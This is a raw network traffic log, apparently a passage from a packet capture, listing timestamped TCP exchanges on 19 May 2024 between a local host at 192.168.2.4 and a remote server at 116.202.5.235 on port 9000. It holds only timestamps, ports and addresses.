May 19, 2024 09:09:08.712861061 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.712893009 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.712943077 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.713011026 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.713058949 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.713110924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.713172913 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.713570118 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.713603020 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.713620901 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.713635921 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.713646889 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.713680983 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.713754892 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.713818073 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.713855982 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.713983059 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.714441061 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.714473009 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.714494944 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.714504957 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.714520931 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.714536905 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.714546919 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.714575052 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.714580059 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.714617968 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.714696884 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.714744091 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.715114117 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.715146065 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.715194941 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.715245008 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.715277910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.715291023 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.715322018 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.715374947 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.715419054 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.715532064 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.715565920 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.715579987 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.715605974 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.716029882 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.716085911 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.716147900 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.716180086 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.716196060 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.716212988 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.716223955 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.716244936 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.716259003 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.716283083 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.718504906 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.718558073 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.718858004 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.718890905 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.718933105 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.718935966 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719047070 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719067097 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719099998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719131947 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719145060 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719355106 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719388008 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719409943 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719429016 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719433069 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719481945 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719609022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719640970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719657898 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719674110 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719682932 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719716072 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.719957113 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.719989061 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720021009 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720036983 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720068932 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720267057 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720463991 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720499039 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720519066 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720530033 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720547915 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720581055 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720591068 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720623970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720640898 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720655918 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720676899 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720689058 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720700026 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720722914 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.720768929 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.720951080 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721009016 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.721055984 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721143961 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.721211910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721245050 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721270084 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.721276999 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721282005 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.721323967 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.721426010 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721493006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.721539974 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721584082 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.721661091 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721693039 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721724987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.721736908 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.721765995 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.722135067 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.722186089 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.722227097 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.722259998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.722292900 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.722311974 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.722337008 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.722445965 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.722516060 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.722851038 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.722883940 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.722901106 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.722929955 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.722964048 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.722996950 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.723012924 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.723026037 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.723041058 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.723073006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.723191023 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.723222971 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.723273039 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.723850012 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.723906994 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.723941088 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.723973989 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.724021912 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.724023104 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.724056959 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.724072933 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.724107027 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.724716902 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.724752903 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.724770069 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.724795103 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.724956989 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.724989891 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.725008011 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.725032091 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.725364923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.725397110 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.725450039 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.725584984 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.725621939 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.725632906 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.725665092 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.725794077 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.725826979 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.725846052 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.725867033 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.726337910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.726397038 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.726561069 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.726594925 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.726619005 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.726623058 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.726632118 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.726669073 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.726706028 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.726850986 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.727093935 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.727128029 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.727148056 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.727164030 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.727230072 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.727264881 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.727278948 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.727293015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.727307081 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.727335930 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.727365017 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.727411032 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728193045 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728244066 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728252888 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728276014 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728296041 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728307009 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728319883 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728358030 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728359938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728391886 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728410959 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728434086 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728585005 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728804111 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728866100 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728919983 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728952885 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.728979111 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.728986979 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729006052 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.729043007 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.729082108 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729115009 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729154110 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.729186058 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.729626894 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729686975 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.729720116 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729769945 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729798079 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729827881 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729836941 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.729836941 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.729887962 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.729897976 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.729934931 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.730124950 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.730155945 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.730184078 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.730217934 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.730534077 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.730592012 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.730657101 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.730690956 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.730705976 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.730722904 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.730735064 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.730771065 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.730832100 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.730884075 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.731379986 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.731430054 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.731458902 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.731463909 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.731486082 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.731528997 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.731561899 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.731585979 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.731616974 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.731642008 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.731674910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.731724977 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.732167959 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.732199907 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.732256889 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.732335091 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.732366085 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.732389927 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.732398987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.732414007 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.732460976 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.732512951 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.732598066 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.732645035 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.732696056 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.733073950 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.733107090 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.733136892 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.733138084 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.733159065 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.733177900 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.733232021 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.733264923 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.733318090 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.733367920 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.733419895 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734055996 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734107018 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734122038 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734136105 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734158993 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734184027 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734235048 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734266043 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734321117 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734375954 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734407902 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734432936 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734466076 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734689951 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734720945 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734746933 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734801054 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734833002 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734833956 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734855890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734868050 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734891891 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734899998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.734950066 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.734968901 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.735021114 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.735090017 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.735161066 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.735567093 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.735618114 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.735625029 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.735646009 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.735668898 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.735678911 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.735697985 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.735727072 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.735830069 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.735863924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.735923052 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.736408949 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.736440897 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.736473083 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.736505985 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.736615896 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.736648083 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.736675978 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.736676931 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.736699104 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.736718893 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.736733913 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.736783028 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.737379074 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.737413883 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.737442017 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.737445116 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.737462997 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.737477064 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.737492085 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.737510920 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.737519979 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.737561941 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.737611055 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.737668991 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.737720013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.737752914 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.737766981 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.737863064 CEST	49750	9000	192.168.2.4	116.202.5.235
